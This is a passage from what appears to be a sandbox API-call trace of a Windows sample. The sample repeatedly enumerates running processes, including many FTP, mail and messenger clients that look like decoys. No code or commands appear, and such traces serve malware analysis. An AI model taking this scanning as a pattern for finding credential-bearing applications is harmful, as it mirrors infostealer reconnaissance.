th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0209.654] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0209.656] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0209.659] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0209.662] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0209.664] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.667] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0209.735] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0209.739] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0209.745] CloseHandle (hObject=0x2110) returned 1 [0209.745] Sleep (dwMilliseconds=0x64) [0209.847] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2110 [0209.861] Process32First (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.863] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.865] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.867] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.869] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.871] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.873] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.876] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.879] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.881] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.887] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.890] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.892] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.895] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.898] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.900] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.902] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.905] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.907] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.910] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.912] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0209.914] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.917] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0209.919] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.921] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0209.926] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0209.929] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0209.932] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0209.934] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0209.936] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0209.938] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.941] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.942] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0209.944] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.946] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.948] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0209.951] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0209.953] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0209.955] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0209.957] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0209.959] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0209.964] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0209.967] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0209.969] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0209.973] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0209.977] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0209.980] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0209.983] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0209.985] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0209.987] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0209.998] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0210.000] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0210.003] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0210.008] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0210.010] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0210.017] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0210.021] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0210.023] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0210.026] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0210.029] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0210.032] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0210.035] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0210.046] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0210.050] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0210.053] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0210.056] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0210.058] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0210.061] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0210.067] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0210.070] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0210.073] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0210.077] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0210.079] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0210.082] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0210.109] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0210.113] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, 